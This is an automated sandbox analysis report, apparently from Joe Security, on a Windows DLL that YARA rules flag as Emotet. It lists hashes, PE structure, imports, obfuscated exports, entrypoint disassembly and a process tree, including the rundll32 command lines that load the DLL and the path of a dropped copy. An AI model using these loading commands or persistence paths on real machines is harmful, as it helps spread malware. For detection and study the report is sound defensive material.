SSDEEP:	96:dC+Po+/a5P+9l/YzWCj/I2lAikSe4dsT2XjFzFNMCDdJR8j5KgNMCQj5dNMCPj5E:0UxNmE2DUJC/PCTCPC2JCBCo
MD5:	895A0530F6008758BC78F45AC359A9CE
SHA1:	CCEA51FC004374A10657E58991084ECB8A5B6131
SHA-256:	87576788303323CCA1677CE84483904037EB48013D4F174A0CBAB030BD14CE7C
SHA-512:	FA65B859797DE4B7BE48432A09E86E76C64612139EF58BB8C71DB1363DE7A0B81754673197D642D441B046FE8700A3636D9D3A9BF0E8705E42AB9686A8B44ED2
Malicious:	false
Preview:	.... ... ....................................... ...!...........................h...p...J........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ........%?...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.2._.0.5.4.0.4.2._.9.3.1...e.t.l.........P.P.h...p...J.......................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.186195017328645
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	snBYiBAMB2.dll
File size:	472064
MD5:	4bd80b1d18138b1808925ddb69991001
SHA1:	2a78af27a95639c1095e4f8a411a8efb9c861abc
SHA256:	32f1f59b8c52019d2a946ddff1996e13fbadac1ed518278a281267f440ea3ea4
SHA512:	d4488b660326344b71e74fb7f8fccd6a51b9f0d34266eb1c05d8d03c511f3e2a6665ee168afa96a35a25fcf99e92aa7845f4f3be0dd5c590c628c4c7d0a69819
SSDEEP:	12288:bRCSNg9VtfjQRVcVTd4qoxHbGeJsjEyP79iAM7/3+/Z1:NCh5sQTgxsjEUinE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a~..............f.......f..T....u.......u.......u.......f.......f.......f..........%...Du......Du......Du..............Du.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10014c2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A7B2CD [Wed Dec 1 17:37:17 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	171ec87b04dbf6cc5aa2b57f2bec0e02

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FCC484EC527h
call 00007FCC484EC92Dh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FCC484EC3D3h
add esp, 0Ch
pop ebp
retn 000Ch
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003A3D0h
mov dword ptr [ecx], 1003A3C8h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FCC484EC4FFh
push 10049E1Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FCC484EFC2Eh
int3
push ebp
mov ebp, esp
and dword ptr [1004D888h], 00000000h
sub esp, 24h
or dword ptr [1004C00Ch], 01h
push 0000000Ah
call dword ptr [1003A0C4h]
test eax, eax
je 00007FCC484EC6CFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4a8e0	0x6bc	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4af9c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x24448	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x74000	0x2cb4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x46678	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3a000	0x2e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x385cc	0x38600	False	0.541457351718	data	6.65488747706	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3a000	0x11f44	0x12000	False	0.496636284722	data	5.5177662601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4c000	0x23d4	0x1600	False	0.225852272727	data	3.92752770482	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x4f000	0x24448	0x24600	False	0.805768094931	data	7.67601542511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x74000	0x2cb4	0x2e00	False	0.726647418478	data	6.54150636624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
TYPELIB	0x72c30	0x670	data	English	United States
RT_BITMAP	0x4f190	0x23867	data	Russian	Russia
RT_STRING	0x732a0	0x26	data	English	United States
RT_VERSION	0x729f8	0x238	data	English	United States
RT_MANIFEST	0x732c8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhValidatePathW, PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhOpenQueryW
KERNEL32.dll	GetCurrentThreadId, GetEnvironmentStringsW, FlushProcessWriteBuffers, GetCurrentProcessorNumber, GetLastError, GetCurrentProcess, GetCommandLineW, TlsAlloc, MultiByteToWideChar, RaiseException, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, DisableThreadLibraryCalls, IsProcessorFeaturePresent, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleCP, WriteFile, GetACP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, FreeEnvironmentStringsW, GetCommandLineA, IsValidCodePage, FindNextFileW, FindFirstFileExW, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleHandleExW, ExitProcess, TlsFree, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, InterlockedFlushSList, RtlUnwind, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetThreadLocale, GetOEMCP, GetThreadErrorMode, GetTickCount, GetProcessHeap, CloseHandle, ReadFile, FindClose, IsDebuggerPresent, UnregisterApplicationRestart, GetTickCount64, ReadConsoleW, SetStdHandle, CreateFileW, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlushFileBuffers, GetStringTypeW, LCMapStringEx, EncodePointer, LocalFree, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, TerminateProcess
USER32.dll	GetCapture, GetActiveWindow, EmptyClipboard, GetForegroundWindow, GetClipboardSequenceNumber, GetDesktopWindow, CountClipboardFormats, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, GetWindowLongW, SetWindowLongW, CharNextW, UnregisterClassW, CloseClipboard, AnyPopup, IsProcessDPIAware, GetMessageTime
GDI32.dll	SetBkMode, CreateFontW, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, GetTextMetricsW, SelectObject, GetDeviceCaps, GdiFlush, SetTextColor
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	SHGetFolderPathW, ShellExecuteW
ole32.dll	CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, SysAllocStringLen, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib, LoadRegTypeLib, VariantClear

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
awrrqyparpkpycx	2	0x10001350
bcnxvrdkfysosxtof	3	0x10001300
bkthnbqipwkpwbuqn	4	0x10001440
blhbenztkdwg	5	0x10001310
blyqbdpbh	6	0x100015a0
bntxpwehhpaojhbqb	7	0x10001260
cdmahnzd	8	0x10001490
cestjqdez	9	0x10001540
ctckagthn	10	0x10001240
dasxnlwgrpainp	11	0x100015b0
dvftcymvsa	12	0x100012a0
dwgavci	13	0x10001590
eabfguyuttqf	14	0x10001320
ejtkhwatnfrlrr	15	0x100013f0
eomwtglrqfutbo	16	0x100013c0
frpzizrlrcgr	17	0x10001570
gbdiswsds	18	0x10001280
gcmzsgn	19	0x100012f0
gqfwwufmukqeio	20	0x100014b0
hcnqnfylg	21	0x10001610
hhcdvbefdscafwa	22	0x10001520
htzzzgduzk	23	0x10001380
icxceeklnawczpwc	24	0x10001480
jahiwehoyrycsjhf	25	0x10001360
jgoglnajycfrlk	26	0x10001510
jiyrjpoumdwxexxsv	27	0x100013a0
jtqskxtgkrkia	28	0x10001270
kbvifuif	29	0x10001600
kputsvjabepsnzox	30	0x10001530
lmmbdiqa	31	0x10001640
lpbmrlvinpqalyd	32	0x100013b0
mfeamwllbq	33	0x10001370
mutwgttswogaa	34	0x10001450
ngxkyaylt	35	0x100013e0
nogpzigjdf	36	0x10001330
nrnuphftbngzc	37	0x10001400
nxjosmfchcjxsr	38	0x100015e0
onxxivtoov	39	0x10001560
oskjmlpxjpcxnlzl	40	0x10001470
pevxjgue	41	0x100012e0
qqedzerkzspr	42	0x100012b0
qtvjelwfroyj	43	0x10001660
qwmwbtewatvhnva	44	0x10001410
qznyvarzsmhpjpx	45	0x10001500
rjtbflwz	46	0x10001240
rmlylgegemvlohqmb	47	0x10001430
rzbjjhcysrzuum	48	0x10001650
sdkesgqtpetexasn	49	0x10001390
szoxdysyyzkhjkn	50	0x100014f0
tflxdiilstfp	51	0x100015f0
tkldqyrppxwplz	52	0x10001630
tkzbqgarrm	53	0x10001230
upsxxlezh	54	0x100013d0
vuhxpaqaemgxeob	55	0x100014c0
vvvqeplpriipkgtv	56	0x10001340
wntjrfbwziesleuyp	57	0x10001420
wuqulebvho	58	0x10001250
xjsxvfowvjvdcbgz	59	0x100015c0
xovnlwuunlqusqqq	60	0x10001550
xpcbxiugz	61	0x100014e0
ydjlotnbubccokwt	62	0x100014a0
ydysedvaagyxiyrt	63	0x10001290
yisncivd	64	0x10001380
ymaojtetv	65	0x100012c0
ypprhtipwpldcl	66	0x100012d0
zclangwoeoirusft	67	0x100015d0
zfykixsa	68	0x100014d0
ztgisvyh	69	0x10001620
zwijaemkuj	70	0x10001460
zzniuhcueiwdb	71	0x10001580

Version Infos

Description	Data
InternalName	Ctqfbxsirs.dll
FileVersion	8.8.7.8
ProductName	Ctqfbxsirs
ProductVersion	8.8.7.8
FileDescription	rqdads
OriginalFilename	Ctqfbxsirs.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4348 Parent PID: 5828

General

Start time:	21:40:05
Start date:	01/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll"
Imagebase:	0x980000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.622227585.0000000000E90000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.622259831.0000000000EFC000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6596 Parent PID: 4348

General

Start time:	21:40:05
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6560 Parent PID: 4348

General

Start time:	21:40:06
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,Control_RunDLL
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.585330942.0000000002E36000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6628 Parent PID: 6596

General

Start time:	21:40:06
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.582748176.0000000000675000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6644 Parent PID: 572

General

Start time:	21:40:09
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5744 Parent PID: 4348

General

Start time:	21:40:10
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,awrrqyparpkpycx
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.604540735.0000000000AAA000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.604509096.0000000000990000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5976 Parent PID: 4348

General

Start time:	21:40:14
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,bcnxvrdkfysosxtof
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.622753667.0000000002DEA000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6768 Parent PID: 572

General

Start time:	21:40:25
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5092 Parent PID: 572

General

Start time:	21:40:43
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 7076 Parent PID: 572

General

Start time:	21:41:04
Start date:	01/12/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7b1450000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4360 Parent PID: 572

General

Start time:	21:41:16
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6120 Parent PID: 6628

General

Start time:	21:42:27
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Imagebase:	0x7ff682a50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5116 Parent PID: 6560

General

Start time:	21:42:28
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop",rRrsbNdtBW
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.753889449.0000000002DB5000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4548 Parent PID: 4360

General

Start time:	21:42:33
Start date:	01/12/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7059e0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4544 Parent PID: 4548

General

Start time:	21:42:34
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6225d0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6132 Parent PID: 5744

General

Start time:	21:42:34
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5984 Parent PID: 5976

General

Start time:	21:42:46
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1896 Parent PID: 4348

General

Start time:	21:42:47
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1356 Parent PID: 572

General

Start time:	21:42:56
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5340 Parent PID: 572

General

Start time:	21:43:34
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2584 Parent PID: 572

General

Start time:	21:43:40
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4104 Parent PID: 5116

General

Start time:	21:43:44
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 400 Parent PID: 572

General

Start time:	21:43:56
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4348 Parent PID: 5828 loaddll32.exeCOMMON

Executed Functions

Function 6EA062C0, Relevance: 45.3, APIs: 22, Strings: 3, Instructions: 1527COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6EA06328
__aullrem.LIBCMT ref: 6EA06368

Strings

s, xrefs: 6EA06D10
&, xrefs: 6EA067C3
w, xrefs: 6EA073AF

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: &$s$w
API String ID: 3839614884-3469592288
Opcode ID: 91b7ec510878dcab316c8dc89a712bdb05977eb71e56ccde887ddeb2624f0c5f
Instruction ID: bd30aa8ee314998c909bb6609b95e790a59eb2c38c8d4e6719748bfd7752292e
Opcode Fuzzy Hash: 91b7ec510878dcab316c8dc89a712bdb05977eb71e56ccde887ddeb2624f0c5f
Instruction Fuzzy Hash: D2D2CC30928B458FC755DF79D18061AB7E5BFCA358F288A2EF485A7350EB31D8C18B46

Uniqueness

Uniqueness Score: -1.00%

Function 6EA057C0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(6EA00000,000000C9,00000002,00000002,74E00DE0,00000000), ref: 6EA05853

Strings

{, xrefs: 6EA05838
L, xrefs: 6EA0583F
`, xrefs: 6EA05826
I, xrefs: 6EA05818

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
